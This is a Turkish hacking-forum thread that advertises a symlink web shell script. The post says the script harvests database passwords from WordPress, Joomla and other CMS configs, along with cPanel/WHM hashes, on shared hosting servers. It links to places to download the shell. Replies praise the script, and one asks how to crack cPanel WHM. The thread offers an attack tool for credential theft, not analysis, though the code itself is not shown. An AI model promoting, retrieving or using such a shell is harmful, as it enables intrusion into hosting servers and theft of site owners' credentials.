C

Crysuder

Script çok sağlam en gözdelerimden Symlink fonksiyonları açıksa hiç affetmiyor sadece configleri değil eğer izinler mevcutsa cpanel ve whm hash ve whm config dahil çekiyor. LiteSpeed için ve Apache için seçenekler mevcut ve sunucu algoritması home1 home2 gibi bir şekildeyse o algoritmaları seçebiliyorsunuz. Şifre Çek butonu var config url sini yazdığınız zaman tüm wordpress config passwordlarını alta sıralıyor whm ve cpanel brute için etik bir yöntem. içinde kesinlikle log yoktur zaten açık kaynak kodlu şifrelenmemiş olarak vericem inceleye bilirsiniz. iyi forumlar.

Destekli CMS; Wordpress - Joomla - vb - whmcs - phpBB - Meganto - PrestaShop- Drupal - Opencart

Kıdemi olmayıp içeriği göremeyen üyelerimiz https://proshell.xyz adesinden temin edebilirler.

PbdBTx.png


https://shellx.org/Shell/symlink.txt
 
Last edited by a moderator:
Joined
Jul 3, 2019
Credits
0
Rating - 0%
Script çok sağlam en gözdelerimden Symlink fonksiyonları açıksa hiç affetmiyor sadece configleri değil eğer izinler mevcutsa cpanel ve whm hash ve config dahil çekiyor. LiteSpeed için ve Apache için seçenekler mevcut ve sunucu algoritması home1 home2 gibi bir şekildeyse o algoritmaları seçebiliyorsunuz. Şifre Çek butonu var config url sini yazdığınız zaman tüm wordpress config passwordlarını alta sıralıyor whm ve cpanel brute için etik bir yöntem. içinde kesinlikle log yoktur zaten açık kaynak kodlu şifrelenmemiş olarak vericem inceleye bilirsiniz. iyi forumlar.

Destekli CMS; Wordpress - Joomla - vb - whmcs - phpBB - Meganto - PrestaShop- Drupal - Opencart


PbdBTx.png


script good working
 
Joined
Oct 28, 2021
Credits
0
Rating - 0%
Hello support how's every thing i new here in this site forum i just wanna know how to crack cpanel whm ????? because i saw a loot of video they using hashaccess but it doesn't work ???
 

Users who are viewing this thread

Top